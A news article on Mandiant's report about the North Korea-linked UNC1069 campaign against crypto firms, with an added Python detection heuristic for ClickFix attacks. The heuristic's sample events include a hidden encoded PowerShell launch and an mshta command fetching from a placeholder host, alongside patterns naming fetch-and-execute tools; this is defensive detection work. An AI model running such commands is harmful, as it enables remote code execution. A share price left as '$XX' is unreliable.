
Mandiant, which operates under Google Cloud, has identified an escalating North Korea-linked cyber campaign targeting cryptocurrency and fintech firms with advanced malware and AI-enabled social engineering.
The threat cluster, tracked as UNC1069, deployed seven distinct malware families designed to harvest and exfiltrate sensitive data, marking a significant expansion of activity first monitored by Mandiant in 2018.
“This investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data: SILENCELIFT, DEEPBREATH and CHROMEPUSH,” Mandiant said in its report.
The campaign leveraged compromised Telegram accounts and staged fake Zoom meetings featuring AI-generated deepfake videos, with victims tricked into running hidden commands in so-called ClickFix attacks.
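The ClickFix pattern described above is visible to defenders at the moment the victim pastes the lure's text into the Run dialog or a terminal: a human-driven parent process (explorer.exe or a browser) spawns a script interpreter with flags a user rarely types by hand. The following detection heuristic is an added example written for this article; it is not code from Mandiant's report and carries none of the report's indicators. It assumes Sysmon-style process-creation fields (ParentImage, Image, CommandLine), and the sample events, the interpreter list, the parent list and the pattern labels are all constructed assumptions to adapt to your own telemetry.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

@dataclass
class ProcessEvent:
    """Minimal Sysmon-style process-creation record (field names are an assumption)."""
    parent_image: str
    image: str
    command_line: str

# Interpreters a ClickFix lure typically asks the victim to launch.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Parents that indicate a human-initiated launch: the Run dialog / Start menu
# (explorer.exe) or a browser that showed the fake "verification" page.
USER_DRIVEN_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Command-line traits that rarely appear when a user deliberately runs a tool.
SUSPICIOUS_PATTERNS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+\S{16,}", re.I), "encoded command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "inline expression execution"),
    (re.compile(r"\b(downloadstring|invoke-webrequest|iwr|curl|wget)\b", re.I), "remote fetch"),
    (re.compile(r"\bmshta(\.exe)?\s+https?://", re.I), "mshta remote HTA"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), "profile bypass"),
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def clickfix_indicators(event: ProcessEvent) -> List[str]:
    """Return the reasons this event looks like a ClickFix-style execution; empty if none.

    Both conditions must hold: a script interpreter was launched, and it was launched
    from a user-driven parent. Scheduled or service-driven interpreters are excluded
    on purpose so that routine administration does not trip the rule.
    """
    if basename(event.image) not in INTERPRETERS:
        return []
    if basename(event.parent_image) not in USER_DRIVEN_PARENTS:
        return []
    return [label for pattern, label in SUSPICIOUS_PATTERNS if pattern.search(event.command_line)]

def detect(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, List[str]]]:
    """Run the heuristic over a batch of events and keep only those with indicators."""
    findings = []
    for event in events:
        reasons = clickfix_indicators(event)
        if reasons:
            findings.append((event, reasons))
    return findings

# Constructed sample telemetry (not from the report); the encoded blob and the URL are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -enc UABsAGEAYwBlAGgAbwBsAGQAZQByAA=="),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\notepad.exe",
                 "notepad.exe notes.txt"),
    ProcessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c mshta http://EXAMPLE-PLACEHOLDER/x"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\scripts\maint.ps1"),
]

if __name__ == "__main__":
    for event, reasons in detect(SAMPLE_EVENTS):
        print(f"{basename(event.parent_image)} -> {basename(event.image)}: {', '.join(reasons)}")
```

The parent-process condition is what keeps this rule quiet on a busy estate: the same encoded PowerShell launched by a management agent is excluded, while the identical command pasted into the Run dialog is flagged. Pair it with clipboard or Run-dialog MRU telemetry where available, since the lure text itself (a "fix" or "verification" instruction) is the strongest corroborating artefact.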
Two newly identified malware strains, CHROMEPUSH and DEEPBREATH, were engineered to bypass key operating system protections and extract personal data. Following the announcement, the Alphabet share price was unchanged at $XX.
Mandiant said artificial intelligence tools enabled the suspected North Korean actors to scale operations from November 2025, introducing AI-enabled lures into active campaigns targeting crypto companies, software developers and venture capital firms.
The warning follows a string of North Korea-linked crypto incidents, including freelance developer infiltrations in 2025 and the $1.4 billion hack of Bybit attributed to the Lazarus Group, underscoring persistent cyber risks across the digital asset sector.